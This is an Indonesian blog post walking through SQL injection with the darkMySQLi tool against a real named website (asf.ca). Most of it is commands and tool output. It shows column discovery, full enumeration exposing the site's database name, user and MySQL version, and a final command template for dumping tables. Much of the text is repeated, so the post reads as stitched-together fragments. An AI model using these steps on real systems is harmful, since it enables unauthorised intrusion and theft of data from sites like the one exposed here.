tools ini mungkin memang sudah basi .. tapi berhubung ada di backtrack 5
so .. ane rasa mesti ane posting di mari ...hmmm.. jadi bagi teman2
yang sudah tau tentang tools ini harap diam dan biarkan yang lain yang
belum tau bisa belajar 
ok deh langsung saja
di backtrack 5 R1 tools ini berada pada directory
ok anggap udah di dalam ya ...
ane kebetulan dapet situs yang vurln bakal ane jadiin contoh di mari
udah ane kirim email ke adminya biar di patch kok cuma buat sample doang...
ok sekarang kita lihat opsi help pada tools ini
Untuk tahap awal kita harus mencari colom dari database situs target
syntax
klo situs tadi vurln maka Langkah berikutnya seperti akhir pesan pada toos tersebut "Don't forget to check darkMySQLI.log" maka kita periksa log tersebut yang berada dalam satu directory dengan tools tersebut
root@zee-eichel{/pentest/web/darkmysqli}:cat darkMySQLi.log
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,
[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de--
[-] [18:45:24]
[-] Total URL Requests: 2
[-] Done
nah perhatikan yang udah ane kasi warna merah ,, untuk langkah ketiga masukan sintax
Tujuan kita sebenarnya adalah menampilkan semua kolom yang ada pada database situs korban
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720+AND+1=...darkc0de-- --full
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.asf.ca/news.php?id=720+AND+1=...IMIT+0,1--
[-] 18:54:41
[-] Total URL Requests: 3
[-] Done
Don't forget to check darkMySQLi.log
Lankah selanjutnya adalah liat lagi di log tadi
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790
[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done
Perhatikan lagi yang ane warnai merah
kita sudah mendapatkan nama database, user dan versi ,, masih 5 w0w w0w .. masih ada juga yang make versi 5 ckckckkc
Langkah selanjutnya tinggal dump databasenya kwkwkwkw
bisa pake manual kan udah ada tuh ..
syntax
udah dulu deh moga berguna ..
ok deh langsung saja
di backtrack 5 R1 tools ini berada pada directory
Code:
/pentest/web/darkmysqliok anggap udah di dalam ya ...
Code:
root@zee-eichel{/pentest/web/darkmysqli}:ls
./ ../ darkMySQLi.log DarkMySQLi.py
root@zee-eichel{/pentest/web/darkmysqli}:ane kebetulan dapet situs yang vurln bakal ane jadiin contoh di mari
Code:
ttp://www.asf.ca/news.php?id=720'udah ane kirim email ke adminya biar di patch kok
cuma buat sample doang...ok sekarang kita lihat opsi help pada tools ini
Spoiler! :
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py --help
darkMySQLi v1.6 rsauron@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information
Target:
-u URL, --url=URL Target url
Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file
darkMySQLi v1.6 rsauron@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information
Target:
-u URL, --url=URL Target url
Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file
Untuk tahap awal kita harus mencari colom dari database situs target
syntax
Quote:python DarkMySQLi.py -u situstarget.com/bugs.php?id=[sql error] --findcol
Spoiler! :
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720 --findcol
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,
[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...darkc0de--
[-] 18:07:20
[-] Total URL Requests: 2
[-] Done
Don't forget to check darkMySQLi.log
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,
[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...darkc0de--
[-] 18:07:20
[-] Total URL Requests: 2
[-] Done
Don't forget to check darkMySQLi.log
klo situs tadi vurln maka Langkah berikutnya seperti akhir pesan pada toos tersebut "Don't forget to check darkMySQLI.log" maka kita periksa log tersebut yang berada dalam satu directory dengan tools tersebut
Spoiler! :
root@zee-eichel{/pentest/web/darkmysqli}:cat darkMySQLi.log
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,
[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de--
[-] [18:45:24]
[-] Total URL Requests: 2
[-] Done
nah perhatikan yang udah ane kasi warna merah ,, untuk langkah ketiga masukan sintax
Tujuan kita sebenarnya adalah menampilkan semua kolom yang ada pada database situs korban
Quote:python DarkMySQLi.py -u [url dari log dark log]-- --full
Spoiler! :
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720+AND+1=...darkc0de-- --full
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.asf.ca/news.php?id=720+AND+1=...IMIT+0,1--
[-] 18:54:41
[-] Total URL Requests: 3
[-] Done
Don't forget to check darkMySQLi.log
Lankah selanjutnya adalah liat lagi di log tadi
Spoiler! :
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790
[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done
Perhatikan lagi yang ane warnai merah
kita sudah mendapatkan nama database, user dan versi ,, masih 5 w0w w0w .. masih ada juga yang make versi 5 ckckckkc
Langkah selanjutnya tinggal dump databasenya kwkwkwkw
bisa pake manual kan udah ada tuh ..
syntax
Code:
darkMySQLi.py -u "(target yg ada bug)" --dump -D (nama databasenya) -T (nama table) -C (column,column)udah dulu deh moga berguna ..
Tidak ada komentar:
Posting Komentar